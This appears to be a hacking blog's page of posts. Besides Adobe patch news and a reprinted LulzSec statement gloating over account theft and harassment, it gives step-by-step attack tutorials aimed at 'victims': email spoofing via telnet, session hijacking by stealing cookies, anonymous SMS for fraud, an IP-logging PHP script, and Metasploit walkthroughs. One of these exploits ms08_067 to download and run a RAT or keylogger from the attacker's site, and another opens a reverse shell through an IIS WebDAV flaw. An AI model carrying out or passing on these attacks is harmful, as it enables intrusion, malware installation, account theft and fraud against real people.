Adobe Patches Critical Vulnerability In Adobe Reader and Flash Player

Adobe has rolled out security updates for its widely used PDF Reader and Flash animation.Some hackers have been exploiting these to hijack user computers.



The emergency patch for Flash was the second time in nine days that Adobe has rushed out a fix for a serious bug in the program. The vulnerability allows attackers to remotely execute malicious code on machines that run the software, and there are reports it's being actively exploited.


The targeted vulnerability resides in Flash versions for Windows, Macintosh, Linux, Solaris and the Android mobile operating system. Tuesday's fix is available for all platforms except for Android.A separate update for Reader fixes at least 13 bugs. Adobe rated 11 of them "critical," a designation typically reserved for vulnerabilities that can be exploited with little or no interaction required by the user to install malware. The flaws involved memory corruption, buffer and heap overflows, DLL load hijacking and other bugs.


Flash and Reader are among the most commonly targeted apps by criminals pushing malware. Users are better off using an alternative PDF reader such as Foxit. While the application has its share of security vulnerabilities, its smaller market share means it's mostly ignored by attackers.

Read More In the Adobe - click here and here

Read more »

Lulzsec Hacking Websites For Fun !!

Today lulzsec made a press release as they hit 1000th tweets. Lulzsec says, they are hacking websites just for fun.

The below shown is the press release made by lulzsec.

Dear Internets,

This is Lulz Security, better known as those evil bastards from twitter. We just hit 1000 tweets, and as 
such we thought it best to have a little chit-chat with our friends (and foes).

For the past month and a bit, we've been causing mayhem and chaos throughout the Internet, attacking 
several targets including PBS, Sony, Fox, porn websites, FBI, CIA, the U.S. government, Sony some more, 
online gaming servers (by request of callers, not by our own choice), Sony again, and of course our good 
friend Sony.

While we've gained many, many supporters, we do have a mass of enemies, albeit mainly gamers. The main 
anti-LulzSec argument suggests that we're going to bring down more Internet laws by continuing our public 
shenanigans, and that our actions are causing clowns with pens to write new rules for you. But what if we 
just hadn't released anything? What if we were silent? That would mean we would be secretly inside FBI 
affiliates right now, inside PBS, inside Sony... watching... abusing...

Do you think every hacker announces everything they've hacked? We certainly haven't, and we're damn sure 
others are playing the silent game. Do you feel safe with your Facebook accounts, your Google Mail 
accounts, your Skype accounts? What makes you think a hacker isn't silently sitting inside all of these 
right now, sniping out individual people, or perhaps selling them off? You are a peon to these people. 
A toy. A string of characters with a value.

This is what you should be fearful of, not us releasing things publicly, but the fact that someone hasn't 
released something publicly. We're sitting on 200,000 Brink users right now that we never gave out. It 
might make you feel safe knowing we told you, so that Brink users may change their passwords. What if we 
hadn't told you? No one would be aware of this theft, and we'd have a fresh 200,000 peons to abuse, 
completely unaware of a breach.

Yes, yes, there's always the argument that releasing everything in full is just as evil, what with 
accounts being stolen and abused, but welcome to 2011. This is the lulz lizard era, where we do things 
just because we find it entertaining. Watching someone's Facebook picture turn into a penis and seeing 
their sister's shocked response is priceless. Receiving angry emails from the man you just sent 10 dildos 
to because he can't secure his Amazon password is priceless. You find it funny to watch havoc unfold, and 
we find it funny to cause it. We release personal data so that equally evil people can entertain us with 
what they do with it.

Most of you reading this love the idea of wrecking someone else's online experience anonymously. It's 
appealing and unique, there are no two account hijackings that are the same, no two suddenly enraged 
girlfriends with the same expression when you admit to killing prostitutes from her boyfriend's recently 
stolen MSN account, and there's certainly no limit to the lulz lizardry that we all partake in on some 
level.

And that's all there is to it, that's what appeals to our Internet generation. We're attracted to 
fast-changing scenarios, we can't stand repetitiveness, and we want our shot of entertainment or we just 
go and browse something else, like an unimpressed zombie. Nyan-nyan-nyan-nyan-nyan-nyan-nyan-nyan, 
anyway...

Nobody is truly causing the Internet to slip one way or the other, it's an inevitable outcome for us 
humans. We find, we nom nom nom, we move onto something else that's yummier. We've been entertaining you 
1000 times with 140 characters or less, and we'll continue creating things that are exciting and new until 
we're brought to justice, which we might well be. But you know, we just don't give a living fuck at this 
point - you'll forget about us in 3 months' time when there's a new scandal to gawk at, or a new shiny 
thing to click on via your 2D light-filled rectangle. People who can make things work better within this 
rectangle have power over others; the whitehats who charge $10,000 for something we could teach you how 
to do over the course of a weekend, providing you aren't mentally disabled.

This is the Internet, where we screw each other over for a jolt of satisfaction. There are peons and lulz 
lizards; trolls and victims. There's losers that post shit they think matters, and other losers telling 
them their shit does not matter. In this situation, we are both of these parties, because we're fully 
aware that every single person that reached this final sentence just wasted a few moments of their time.

Thank you, bitches.
Lulz Security

What if lulzsec gona continue this?  This will affect common people too right? What you think? Comment on it!

Read more »

Your Passwords Leaked By Lulzsec? Find out Now!

Are you sure your Email/Password is safe? Want to know whether your passwords leaked or not?  Gizmodo.com  launched a searchable database using which you can search whether your email/passwords is leaked or not.

Yesterday Lulzsec released Email/Passwords of  62,000 people obtained from various sources. Reports say the list includes login information for websites like Paypal, Facebook, Gmail, and even some online multipplayer gamers Etc.

Find Out Now!

62000 passwords download mediafire lulzsec filesonic download lulzsec mediafire e,ail passwords download lulzsec

Read more »

Some Google Tricks

A few things you might want to try with Google.Hand type the following prefixes in GOOGLE and note their utility:

link:url Shows other pages with links to that url.

related:url same as "what's related" on serps.

site:domain restricts search results to the given domain.

allinurl: shows only pages with all terms in the url.

inurl: like allinurl, but only for the next query word.

allintitle: shows only results with terms in title.

intitle: similar to allintitle, but only for the next word. "intitle:webmasterworld google" finds only pages with webmasterworld in the title, and google anywhere on the page.

cache:url will show the Google version of the passed url.

info:url will show a page containing links to related searches, backlinks, and pages containing the url. This is the same as typing the url into the search box.

spell: will spell check your query and search for it.

stocks: will lookup the search query in a stock index.

filetype: will restrict searches to that filetype. "-filetype:doc" to remove Microsoft word files.

daterange: is supported in Julian date format only. 2452384 is an example of a Julian date.

maps: If you enter a street address, a link to Yahoo Maps and to MapBlast will be presented.

phone: enter anything that looks like a phone number to have a name and address displayed. Same is true for something that looks like an address (include a name and zip code)

site:www.somesite.net "+www.somesite.+net"  (tells you how many pages of your site are indexed by google)

allintext: searches only within text of pages, but not in the links or page title

allinlinks: searches only within links, not text or title

I hope there is something new in here for you and maybe this info's will be helpful for You!!

HAPPY HACKING!!

Read more »

Spoofing emails via telenet

Get a smtp server ( i use mx1.hotmail.com) theyre normally like mx1,mx2 etc..thehost.com.

Now, go to Start>Run>cmd 

Then in the cmd window, type "telnet mx1.hotmail.com 25"

Then "HELO hotmail.com"

Then "MAIL FROM : (fakeemailhere)"

Then "RCPT TO: (person)"

Then "DATA (your Message)", finish the message by a full stop (.) on a new line and press enter!

Email spoofed!! :D :D

Read more »

How to Hack Email Account with Cookie stealing [For Newbies]

How to hack Email account:

If you are a newbie and don't know about cookie, then for your information, Cookie is a piece of text stored on user computer by websites visited by the user. This stored cookie is used by webserver to identify and authenticate the user. So, if you steal this cookie (which is stored in victim browser) and inject this stealed cookie in your browser, you can imitate victim identity to webserver and enter hisEmail account easily. This is called Session Hijacking. Thus, you can easily hack Email account using such Cookie stealing hacks.

Tools needed for Cookie stealing attack:

Cookie stealing attack requires two types of tools:

1. Cookie capturing tool
2. Cookie injecting/editing tool

1. Cookie capturing tool:

Suppose, you are running your computer on a LAN. The victim too runs on same LAN. Then, you can use Cookie capturing tool to sniff all the packets to and from victim computer. Some of the packets contain cookie information. These packets can be decoded using Cookie capturing tool and you can easily obtain cookie information necessary to hackEmail account. Wireshark and HTTP Debugger Pro softwares can be used to capture cookies.

2. Cookie injecting/editing tool:

Now, once you have successfully captured your victim cookies, you have inject those cookies in your browser. This job is done using Cookie injecting tool. Also, in certain cases after injection, you need to edit cookies which can be done by Cookie editing tool. This cookie injection/editing can be done using simple Firefox addons Add N Edit Cookies and Greasemonkey scripts. I will write more on these two tools in my future articles.

Drawbacks of Cookie Stealing:

Cookie Stealing is neglected because it has some serious drawbacks:

1. Cookie has an expiry time i.e. after certain trigger cookie expires and you cannot use it to hijack victim session. Cookie expiry is implemented in two ways:
   1. By assigning specific timestamp(helpful for us).
   2. By checking for triggers like user exiting from webbrowser. So, in such cases, whenever user exits from his browser, his cookie expires and our captured cookie becomes useless.
2. Cookie stealing becomes useless in SSL encrypted environment i.e. for https (Secure HTTP) links. But, most Email accounts and social networking sites rarely use https unless vicitm has manually set https as mandatory connection type.
3. Also, most cookies expire once victim hits on LogOut button. So, you have to implement this Cookie stealing hack while user is logged in. But, I think this is not such a serious drawback because most of us have the habit of checking "Remember Me". So, very few people actually log out of their accounts on their PCs.

So friends, this was a short tutorial on basics of how to hack Email account using Cookie Stealing. As I have stated, Cookie stealing has some disadvantages. But, I think Cookie stealing is a handy way to hack an Email account. In my next articles, I will post detailed tutorial to hack Facebook and Gmail accounts using Cookie stealing. If you have any problem in this tutorial on how to hack Email account using Cookie stealing, please mention it in comments.

Enjoy Cookie stealing trick to hack Email account...

Read more »

Anonymous SMS : Send Free Anonymous SMS For Lifetime

I have new Send Anonymous Sms site which is free and I think its only working India though its worldwide.

Anonymous SMS : Send Anonymous SMS For Free

I think you all know bout Anonymous SMS so friends I am not taking this topic again and again, Though for newbies I am giving the definition in short.

Anonymous SMS is the type of sms which we or other sends to the mobile with any random number, or you can say any fake mobile number, so the victim cannot know your identity. Its mainly used for this below purposes

• To cheat Business men or normal person
• To make money from fraud
• For just Fun purposes

Send Free Anonymous SMS : How To ??

• Visit Free Anonymous SMS website: Smsti
• Type victim's mobile number and then message
• After click on Send
• Then a small Security.
• Finally Click on 'Agree to Terms'

Screenshots of this website : 

So friends I hope you enjoyed this new trick to send Anonymous SMS And also to prank your friends.. If you have any problem regarding this Anonymous SMS then please do share your problem via comments. I am always here to help you..

Read more »

Infecting Ip using Metasploit

Using this Tutorial You can put your RAT,STEALER,KEYLOGGER or DDOSER using IP and this tutorial.

THIS TUTORIAL IS WRITTEN IN EDUCATIONAL PURPOSES ONLY!!

WE NEED:

1. Nmap

2. Metasploit 

1. First we need to find victms IP. 

You can Follow my TUTORIAL which i posted earlier

2. Now we need to create database.

We open metasploit and type 'db_create' (this will create database)

If you created database before, than its enough to type 'db_connect' ...



3. Now we scan victms IP

So in metasploit type 'Nmap'




Next command is 'nmap -sT -sV <target ip>' (in '<target ip>' we type victms IP without '<>')

When scanning is done, we will have detailed description victms computer...



If we get something like this Windows 2000 (all versions XP SP1, SP2, SP3, SP4) We can without problem do the attack..

4. Exploit




In console we type 'use windows/smb/ms08_067_netapi'

(This will select windows/smb/ms08_067_netapi)



Now type 'set target 0'

Than type 'show payloads'


Than 'set payload / download_exec'



Than type 'Show options'

You will se enough of options, fill only RHOST i URL.



Type: set RHOST <target IP>




Than type 'set URL http://www.site.com/xxx.exe' ('http://www.site.com/ -should be your site , a 'xxx.exe' is name of your RAT, stiler, virus what is uploaded on your site)

(http://www.fileave.com , http://www.zymic.com)


AT the end we type 'exploit'

Note-before Doing this have a look at my previous post Here

Read more »

Metasploiting-Basics

The metasploit environment provides many ready to use exploits and also allows for the security tester to customize them or to create their own exploit. The basic process for using the Metasploit console is not the most intuitive, If a script kiddie use this then surely he will be tired in a day or two.. The basic format for exploiting the system is as follows:

1. Pick which exploit to use

2. Configure the exploit with remote IP address and remote port number

3. Pick a payload

4. Configure the payload with local IP address and local port number

5. Execute the exploit





Example of Using Metasploit




Launch the Metasploit console. To do this, from a command line type the following:

"# " ./msfconsole "

Pick which exploit to use

Once the msfconsole is running, it is time to decide which exploit to attempt against the target system. Your options here stub from the following commands:

• <!--[if !supportLists]-->use
• <!--[if !supportLists]-->show
• <!--[if !supportLists]--><!--[endif]-->info

The use command will tell the utility exactly which exploit to select.  The show command will do nothing on its own, but can be combined with exploits or payloads as shown in the examples below.  The info command provides details about a specific module.



Start by entering "show exploits" to see the list of exploits available.Many of the exploits listed here are going to work against the target servers and in fact many of these exploits are used by ethical hackers. The exploit list upgrades when a better version of metasploit framework comes



I will give u a hint-...."iis50_webdav_ntdll" exploit"



To actually start the exploit type "use iis50_webdav_ntdll"

After use – configure options

We need to set options. These options include the destination IP and the destination port.  The options are configured by using the set command.  The show advanced command will let you know if there are more options that can be set.  Most exploits do not have advanced options.  

Start by typing "show options"

This will show you the command requirements to run the exploit.

These include the RHOST (This is the host that we are going to compromise) and the RPORT (this is the port that the vulnerable function is running on)


To set these options type "set RHOST <your partner machines IP address>" and press enter. On the next line type "set RPORT 80"



Will the Exploit Work ? 



We have  the computer and the exploit. Now we are going to compromise the system.Now is the time to find out:




To perform the check type "check ".

This may not work on all exploits.  This will see if the server or target appears vulnerable.



If your check is unsuccessful, you may need to select some additional options about the target that you are hoping to compromise.  This usually includes a description of the OS and the service pack level of the system. In some modules there is a brute force option.The brute force option will try many memory offsets, but the result will be a lot less stealthy if you are unsuccessful. If you enter "show targets" you should see something like the below.

msf iis50_webdav_ntdll > show targets

Supported Exploit Targets

=========================

0 Windows 2000 Bruteforce

What the attack will do ?






 This is what  Metasploit calls a payload, it is also refer to as shell code or op-code.  This is the code that we wish to have inserted directly into the buffer that we are overflowing.  In most cases the shell code is going to be service pack dependant, OS dependant, and architecture (i386) dependant as well.  This means that most of the payloads in the Metasploit  framework will work for only certain OS’s and on certain processors.  Even if you select an appropriate payload you will have to configure options to get the payload to work.  The most frequently used type of shell code is code that generates a reverse shell from the compromised system back to the attacking system.  Using the stubs mentioned before in the exploits section also apply to the payloads section. If you type "show payloads" you should see a response like the below .

msf iis50_webdav_ntdll > show payloads

Metasploit™ Framework Usable Payloads

====================================

win32_bind Windows Bind Shell

win32_bind_dllinject Windows Bind DLL Inject

win32_bind_meterpreter Windows Bind Meterpreter DLL Inject

win32_bind_stg Windows Staged Bind Shell


win32_bind_stg_upexec Windows Staged Bind Upload/Execute

win32_bind_vncinject Windows Bind VNC Server DLL Inject

win32_exec Windows Execute Command

win32_reverse Windows Reverse Shell

win32_reverse_dllinject Windows Reverse DLL Inject

win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject

win32_reverse_stg Windows Staged Reverse Shell

win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute

win32_reverse_vncinject Windows Reverse VNC Server Inject

In this case the best shell to try will be the win32_reverse payload. To do this type "set PAYLOAD win32_reverse"

This payload requires some options. These include the exit function, the local host and the local port.

To see these options type "show options" you should see something like the below:

msf iis50_webdav_ntdll(win32_reverse) > show options




Exploit and Payload Options

===========================

Exploit: Name Default Description

-------- ------ ----------- ------------------

optional SSL Use SSL

required RHOST 67.36.70.19 The target address

required RPORT 80 The target port



Payload: Name Default Description


-------- -------- ------- ------------------------------------------

required EXITFUNC seh Exit technique: "process", "thread", "seh"

required LHOST Local address to receive connection

required LPORT 4321 Local port to receive connection



Target: Windows 2000 Bruteforce

To set the missing options, we will use the set command like above. Before we can set these values we need to know what they are. To find your local IP address open another shell window, by either right clicking on the desktop or (if your CD has this option) look for the computer icon in the program bar. If you right click on the desktop look for the shell option. If you do this step right you should see a new shell box (kinda sorta like a DOS command prompt box on XP) appear.

Once you have the box open type "ifconfig". This will show the information for all of the interfaces for you linux system. This is the equivalent of the ipconfig command in Windows. You should see something like the following:


[root@localhost ~]# ifconfig

eth0 Link encap:Ethernet HWaddr 00:03:25:13:43:F2

inet addr:10.5.14.173 Bcast:10.5.15.255 Mask:255.255.252.0

inet6 addr: fe80::203:25ff:fe13:43f2/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:4563 errors:0 dropped:0 overruns:0 frame:0

TX packets:2905 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:3696580 (3.5 MiB) TX bytes:325618 (317.9 KiB)


Interrupt:193 Base address:0x4c00



lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

inet6 addr: ::1/128 Scope:Host

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:213 errors:0 dropped:0 overruns:0 frame:0

TX packets:213 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0


RX bytes:49707 (48.5 KiB) TX bytes:49707 (48.5 KiB)

What we are interested in, is the value for the eth0 (or whatever is active on your system it could be eth1 or some other interface), but you should see the value inet addr: and your IP address listed next to this. In the example above the IP address is 10.5.14.173. If you look closely you'll see that it is there. GO ahead and look – no one will laugh I promise.

Once we know this value we will set it with the set command. To do this type "set LHOST <your IP address>". This is all that really needs to be set, but for luck I always make one more change – I set the local port to 5555. This is just for superstition. I'm not going to give you exact instructions on how to do this, but if you can figure it out – be my guest and change it.

This payload with this exploit had no advanced options, but to check for other exploits type "show advanced". You should see something like the below.

msf iis50_webdav_ntdll(win32_reverse) > show advanced


Exploit and Payload Options

===========================



Exploit (Msf::Exploit::iis50_webdav_ntdll):

-------------------------------------------

Payload (Msf::Payload::win32_reverse):

--------------------------------------

This is just a example

Making it all happen

 

Now is the time to see the results  This next phase will actually compromise the system if you have done everything correctly and the system is vulnerable.  If all goes Right you will own the box.


To do this type "exploit"

Once you launch the exploit it may take some time. The exploit is trying to brute force the memory offset for the vulnerable function..Means in good words it is exploiting the computer

If you've done everything right you should see something like the below.

[*] Starting Reverse Handler.

[*] Connecting to web server. OK

[*] Trying return address 0x004e004f...

[*] Sending request (65739 bytes)

[*] Connecting to web server. OK


[*] Trying return address 0x00420041...

[*] Sending request (65739 bytes)

[*] Connecting to web server. OK

[*] Trying return address 0x00430041...

[*] Sending request (65739 bytes)

[*] Connecting to web server. OK

[*] Trying return address 0x00c10041...

[*] Sending request (65739 bytes)

[*] Connecting to web server. OK


[*] Trying return address 0x00c30041...

[*] Sending request (65739 bytes)

[*] Connecting to web server. OK

[*] Trying return address 0x00c90041...

[*] Sending request (65739 bytes)

If you are successful you'll have a remote connection into the target machine and can do whatever you want. Once you've done this and received the prompt for the other system you are the OWNER ..You may want to  crack the passwords–or you can create your own netcat backdoor.



You will find this Framework www.metasploit.com/framework/download




I was also very weak at metasploiting but i know the basics means i can do it practically whenever i want.



You may find many articles related to the same topic as mine but i tried to make it understand in a easy way.

Happy Hacking:)

Read more »

IP Catcher-Steal Ip's

Many People are very curious to know the ip of the friend we are chatting using Google talk though they don't know how to use it in a good or a bad way. I will In this article teach you how to steal ip using a PHP script



NOTE: This tutorial is for educational purposes only, I am NOT responsible in any way for how this information is used, use it at your own risk.

How to steal a Ip adress?? 

Register a Free hosting at byethost and follow the steps.

<html>


<?php

$file = "ips.txt";

$f=fopen($file, 'a');

fwrite($f,$_SERVER['REMOTE_ADDR']."\n");

fclose($f);

?>

<p>Nothing Found!!saurav!!</p>

</body>


</html>

 Save it as steal.php

1.) First of all you need to make a new .txt document on the website you're uploading this to. Name it ips.txt (You can change that in the script aswell where it says $file = 'ips.txt'; in the second line)(which i have done already) . Then change the CHMOD to 777.



2.) Now you need to past the script above in to a steal.php document, and upload it. 




3.) Now you make people visit your site, and they will see only " Nothing Found!!saurav!! " !



4.) To view the IP, you simply add "/ips.txt" after your domain, and you'll see the IP.

This is a very simple, but effectually method for stealing someones IP Address.
Happy Hacking.

 

Read more »